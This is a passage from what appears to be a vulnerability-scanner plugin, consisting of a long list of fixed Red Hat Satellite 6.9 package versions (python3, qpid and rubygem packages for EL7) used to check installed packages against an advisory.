'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-gobject-3.22.0-8.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-gobject-base-3.22.0-8.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-gunicorn-20.0.4-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-idna-2.10-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-idna-ssl-1.1.0-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-importlib-metadata-1.7.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-inflection-0.5.1-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-iniparse-0.4-33.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-jdcal-1.4.1-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-jinja2-2.11.2-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-jsonschema-3.2.0-4.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-libcomps-0.1.15-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-markuppy-1.14-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-markupsafe-1.1.1-4.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-mongoengine-0.20.0-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-multidict-4.7.6-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-odfpy-1.4.1-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-openpyxl-3.0.5-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-productmd-1.31-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-prometheus-client-0.7.1-2.el7ar', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-psycopg2-2.8.6-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pulp-2to3-migration-0.10.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pulp-certguard-1.0.3-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pulp-container-2.1.1-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pulp-file-1.3.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pulp-rpm-3.9.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pulpcore-3.7.3-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pycares-3.1.1-2.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pycparser-2.20-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pycryptodomex-3.9.8-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pygtrie-2.3.3-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pyjwkest-1.4.2-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pyjwt-1.7.1-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pymongo-3.11.0-3.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pyOpenSSL-19.1.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pyrsistent-0.17.3-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pytz-2020.4-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-pyyaml-5.3.1-3.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-receptor-satellite-1.3.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-redis-3.5.3-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-requests-2.24.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-rpm-4.11.3-8.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-rq-1.5.2-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-semantic-version-2.8.5-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-six-1.15.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-solv-0.7.12-2.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-sqlparse-0.4.1-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-subscription-manager-rhsm-1.27.5-4.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-tablib-2.0.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-typing-3.7.4.3-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-typing-extensions-3.7.4.3-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-uritemplate-3.0.1-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-url-normalize-1.4.3-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-urllib3-1.25.11-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-urlman-1.3.0-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-whitenoise-5.2.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-xlrd-1.2.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-xlwt-1.3.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-yarl-1.6.2-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-zipp-3.4.0-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-cpp-client-1.36.0-28.el7amq', 'cpu':'x86_64', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-cpp-client-devel-1.36.0-28.el7amq', 'cpu':'x86_64', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-cpp-server-1.36.0-28.el7amq', 'cpu':'x86_64', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-cpp-server-linearstore-1.36.0-28.el7amq', 'cpu':'x86_64', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-dispatch-router-1.5.0-4.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-dispatch-tools-1.5.0-4.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-proton-c-0.28.0-4.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-qmf-1.36.0-28.el7amq', 'cpu':'x86_64', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'qpid-tools-1.36.0-28.el7amq', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'receptor-0.6.3-1.el7ar', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'redhat-access-insights-puppet-1.0.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'repoview-0.6.6-11.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rh-postgresql12-postgresql-evr-0.0.2-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rhel8-kickstart-setup-0.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-facter-2.4.1-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-fast_gettext-1.1.0-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-foreman_scap_client-0.4.7-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-highline-1.7.8-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-oauth-0.5.4-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-passenger-4.0.18-24.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-passenger-native-4.0.18-24.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-passenger-native-libs-4.0.18-24.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'rubygem-rack-1.6.12-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'rubygem-rake-0.9.2.2-41.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'saslwrapper-0.22-5.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'satellite-6.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'satellite-capsule-6.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'satellite-cli-6.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'satellite-common-6.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'satellite-debug-tools-6.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'satellite-installer-6.9.0.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-actioncable-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-actionmailbox-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-actionmailer-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-actionpack-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-actiontext-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-actionview-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activejob-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activemodel-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activerecord-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activerecord-import-1.0.0-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activerecord-session_store-1.1.1-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activestorage-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-activesupport-6.0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-addressable-2.6.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-algebrick-0.7.3-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-amazing_print-1.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ancestry-3.0.7-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-anemone-0.7.2-22.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-angular-rails-templates-1.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ansi-1.5.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-apipie-bindings-0.4.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-apipie-dsl-2.3.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-apipie-params-0.0.5-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-apipie-rails-0.5.17-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-audited-4.9.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-bcrypt-3.1.12-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-builder-3.2.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-bundler_ext-0.4.1-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-clamp-1.1.2-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-coffee-rails-5.0.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-coffee-script-2.4.1-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-coffee-script-source-1.12.2-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-connection_pool-2.2.2-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-crass-1.0.6-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-css_parser-1.4.7-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-daemons-1.2.3-7.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-deacon-1.0.0-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-declarative-0.0.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-declarative-option-0.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-deep_cloneable-3.0.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-deface-1.5.3-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-diffy-3.0.1-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-domain_name-0.5.20160310-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-erubi-1.9.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-excon-0.76.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-execjs-2.7.0-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-facter-2.4.0-6.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-faraday-0.17.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-faraday_middleware-0.13.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fast_gettext-1.4.1-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-ffi-1.12.2-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-aws-3.6.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-core-2.1.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-google-1.11.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-json-1.2.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-kubevirt-1.3.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-libvirt-0.7.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-openstack-1.0.8-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-ovirt-1.2.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-vsphere-3.4.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-fog-xml-0.1.2-8.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman-tasks-3.0.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_ansible-6.1.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_ansible_core-4.0.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-foreman_azure_rm-2.1.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 